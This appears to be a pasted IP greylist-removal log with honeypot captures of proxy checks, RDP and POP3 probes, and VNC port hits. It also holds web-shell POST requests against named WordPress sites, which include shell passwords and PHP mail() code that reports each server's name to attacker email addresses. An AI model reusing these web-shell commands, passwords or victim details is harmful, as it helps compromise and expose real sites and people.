Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 5.45.64.0/24
- 5.45.64.14: removed
- 5.45.64.20: removed
- 5.45.64.32: removed
- 5.45.64.39: removed
- 5.45.64.92: removed
- 5.45.64.228: removed
- 5.45.64.161: Recent logs:
- Date: 2017-03-06 16:36:06
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:35226->89.33.5.34:1080",
- "MESSAGES": "Array
- (
- [17:34:42] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 16:35:23
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:49206->178.79.134.254:1080"
- }
- Date: 2017-03-06 16:16:40
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:55544->89.33.5.60:1080",
- "MESSAGES": "Array
- (
- [17:15:44] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 15:57:35
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:35756->89.33.5.53:1080",
- "MESSAGES": "Array
- (
- [16:56:11] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 15:56:48
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:42606->113.52.133.234:1080"
- }
- Date: 2017-03-06 15:38:12
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:34590->51.255.53.224:1080",
- "MESSAGES": "Array
- (
- [09:40:33] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 15:37:44
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:41884->178.32.99.247:1080",
- "MESSAGES": "Array
- (
- [09:32:40] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 15:37:39
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:48624->192.168.0.54:1080",
- "MESSAGES": "Array
- (
- [14:33:25] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- 5.45.67.0/24
- 5.45.67.5: removed
- 5.45.67.80: removed
- 5.45.70.0/24
- 5.45.70.73:
- Date: 2017-02-05 18:50:46
- Attacker ip: 5.45.70.73
- {
- "ip": "5.45.70.73",
- "listname": "openbl_1days",
- "listlink": "https://www.openbl.org/lists/base_1days.txt"
- }
- 5.45.70.75: removed
- 5.45.70.94: removed
- 5.45.70.108: from this IP we experienced lots of GHH port hits
- 5.45.72.0/24
- 5.45.72.29:
- Date: 2017-02-27 22:09:28
- Attacker ip: 5.45.72.29
- {
- "PORT HIT": "5.45.72.29:52984->23.239.77.95:3389",
- "MESSAGES": "Array
- (
- [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- )
- "
- }
- Date: 2017-02-27 22:09:27
- Attacker ip: 5.45.72.29
- {
- "PORT HIT": "5.45.72.29:52983->23.239.77.93:3389",
- "MESSAGES": "Array
- (
- [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- )
- "
- }
- Date: 2017-02-27 22:09:27
- Attacker ip: 5.45.72.29
- {
- "PORT HIT": "5.45.72.29:52982->23.239.77.92:3389",
- "MESSAGES": "Array
- (
- [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- 5.45.72.39:removed
- 5.45.75.0/24
- 5.45.75.2:
- Date: 2017-03-12 14:15:17
- Attacker ip: 5.45.75.2
- {
- "PORT HIT": "5.45.75.2:35242->37.235.1.96:110",
- "MESSAGES": "Array
- (
- [14:09:46] => USER sexual.sexual@everymail.net
- [14:09:46+1] => QUIT
- )
- "
- }
- Date: 2017-03-12 05:43:27
- Attacker ip: 5.45.75.2
- {
- "PORT HIT": "5.45.75.2:55893->37.235.1.96:110",
- "MESSAGES": "Array
- (
- [05:35:58] => USER showboat@everymail.net
- [05:35:58+1] => QUIT
- )
- "
- }
- Date: 2017-03-11 17:13:56
- Attacker ip: 5.45.75.2
- {
- "PORT HIT": "5.45.75.2:36460->5.63.147.236:110",
- "MESSAGES": "Array
- (
- [16:08:01] => USER kurt_castilloae@100-biker.co.uk
- [16:08:01+1] => QUIT
- )
- "
- }
- Date: 2017-03-11 01:43:01
- Attacker ip: 5.45.75.2
- {
- "PORT HIT": "5.45.75.2:52421->84.2.35.144:110",
- "MESSAGES": "Array
- (
- [01:41:59] => USER aloksa@loksacel.hu
- [01:41:59+1] => QUIT
- 5.45.75.24 not able to remove it from the greylist.
- 5.45.75.28: removed
- 5.45.75.41: removed
- 5.45.75.49: removed
- 5.45.76.0/24
- 5.45.76.15:
- Date: 2017-03-02 19:01:46
- Victim domain: www.anodizadosbp.com
- Attacker ip: 5.45.76.15
- Url: [www.anodizadosbp.com/wp-content/themes/twentytwelve/contact.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => jgOoo1skw2a_
- )
- ]
- Date: 2017-03-02 18:49:37
- Victim domain: www.chintannipale.com
- Attacker ip: 5.45.76.15
- Url: [www.chintannipale.com/wp-content/db_info.class.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => ryfgddjs1
- )
- ]
- Date: 2017-03-02 18:49:36
- Victim domain: www.absbe.com
- Attacker ip: 5.45.76.15
- Url: [www.absbe.com/wp-content/common.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => nbJK@SHN2
- )
- ]
- Date: 2017-03-02 18:49:27
- Victim domain: www.davidbillis.net
- Attacker ip: 5.45.76.15
- Url: [www.davidbillis.net/wp-los.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => jgOoo1skw2a_
- )
- ]
- Date: 2017-03-02 18:49:25
- Victim domain: www.chambreavecvie.com
- Attacker ip: 5.45.76.15
- Url: [www.chambreavecvie.com/setting.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => 8I5Ra7z2LaSinfQ
- )
- ]
- Date: 2017-03-02 16:04:36
- Victim domain: www.bratanis.org
- Attacker ip: 5.45.76.15
- Url: [www.bratanis.org/conter.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => jgOoo1skw2a_
- )
- ]
- 5.45.76.44: removed
- 5.45.76.53: removed
- 5.45.76.229: removed
- 5.45.77.0/24
- 5.45.77.6: not able to remove
- 5.45.77.30: removed
- 5.45.77.40: was only on user greylist, but removed from that
- 5.45.77.78: removed
- 5.45.84.0/24: isn't in greylist
- 37.1.202.0/24
- 37.1.202.31: not able to remove
- 37.1.202.44: removed
- 37.1.202.83: it is only on user greylist:
- Date: 2017-03-08 13:28:26
- Attacker ip: 37.1.202.83
- {
- "PORT HIT": "37.1.202.83:63254->72.29.77.55:3389",
- "MESSAGES": "Array
- (
- [07:20:39] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- )
- "
- }
- Date: 2017-03-08 13:28:24
- Attacker ip: 37.1.202.83
- {
- "PORT HIT": "37.1.202.83:56715->72.29.66.61:3389",
- "MESSAGES": "Array
- (
- [07:20:32] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- )
- "
- }
- 37.1.202.93: removed
- 37.1.202.200:
- Date: 2017-03-10 18:32:07
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:39870->89.248.172.104:5900"
- }
- Date: 2017-03-10 13:34:42
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:54920->185.127.128.5:5900"
- }
- Date: 2017-03-09 12:44:12
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:50440->37.97.220.160:5900"
- }
- Date: 2017-03-09 06:57:01
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:42278->91.227.204.247:5666"
- }
- Date: 2017-03-09 06:41:50
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:45080->84.2.35.129:5900"
- }
- Date: 2017-03-09 06:36:33
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:48006->185.127.128.5:5900"
- }
- Date: 2017-03-08 21:50:39
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:35250->91.227.204.21:5666"
- }
- Date: 2017-03-08 19:59:38
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:39376->89.248.172.104:5900"
- }
- 37.1.202.225: not able to remove
- 37.1.202.240: was only on user greylist, but removed from it
- 37.1.202.253: removed
- 37.1.205.0/24
- 37.1.205.86: not able to remove
- 37.1.205.87: was only on user greylist, but removed from it
- 37.1.205.91: removed
- 37.1.206.0/24
- 37.1.206.8: not able to remove
- 37.1.206.114: was only on user greylist, but removed from it
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement